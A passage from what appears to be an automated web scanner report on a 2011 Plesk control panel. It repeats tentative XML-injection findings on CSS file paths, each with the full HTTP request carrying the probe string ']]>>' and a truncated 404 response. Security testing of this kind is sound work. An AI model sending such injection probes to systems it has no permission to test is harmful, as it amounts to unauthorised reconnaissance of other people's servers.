3.158. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/layout.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/layout.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/layout.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:28 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.159. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/main/tabs.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.160. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/main/tabs.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.161. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/main/tabs.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.162. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/main/tabs.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:11 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.163. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main]]>>/tabs.css HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:13 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.164. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/main/tabs.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/main/tabs.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/main/tabs.css]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:16 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.165. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/top/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.166. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/top/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.167. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/top/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.168. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/top/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:10 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.169. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/top]]>>/custom.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.170. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/custom.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/custom.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/top/custom.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.171. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins]]>>/default/plesk/css/top/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:04 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.172. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default]]>>/plesk/css/top/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:06 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.173. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk]]>>/css/top/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:08 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.174. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css]]>>/top/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:10 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.175. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

